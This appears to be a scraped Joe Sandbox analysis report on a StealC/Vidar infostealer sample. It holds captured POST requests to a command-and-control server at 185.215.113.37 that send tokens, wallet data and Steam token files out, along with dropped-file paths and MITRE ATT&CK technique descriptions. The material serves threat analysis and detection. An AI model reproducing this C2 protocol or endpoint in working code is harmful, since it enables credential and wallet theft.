Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHIDHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHDHIIIECBGCAKFIJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------AFCFHDHIIIECBGCAKFIJContent-Disposition: form-data; name="message"wallets------AFCFHDHIIIECBGCAKFIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 2d 2d 0d 0a Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="message"files------GIIDBGDAFHJDHIDGDGII--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGIIHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 2d 2d 0d 0a Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="message"files------GIIDBGDAFHJDHIDGDGII--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 45 43 47 43 42 4b 46 48 49 45 42 47 48 44 42 4b 2d 2d 0d 0a Data Ascii: ------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DGHIECGCBKFHIEBGHDBKContent-Disposition: form-data; name="file"------DGHIECGCBKFHIEBGHDBK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="message"ybncbhylepme------BKFBAKFCBFHIJJJJDBFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFCHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CAAEBKEGHJKEBFHJDBFC--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AECAKJJE

C:\ProgramData\AECAKJJECAEGCBGDHDHC

C:\ProgramData\DBKKKEHDHCBFIEBFBGID

C:\ProgramData\EBAKKFHJ

C:\ProgramData\GIEHIDHJDBFIIECAKECB

C:\ProgramData\JDHCBAEHJJJKKFIDGHJECAFIDA

C:\ProgramData\JKEBFBFIEHIDAAAAFHCFCGIECB

C:\ProgramData\KKFHJDAEHIEHJJKFBGDAKKKKEG

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00359860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 003445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0034BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 00354910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00359C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00347710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00350250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00345100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Function 0034A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre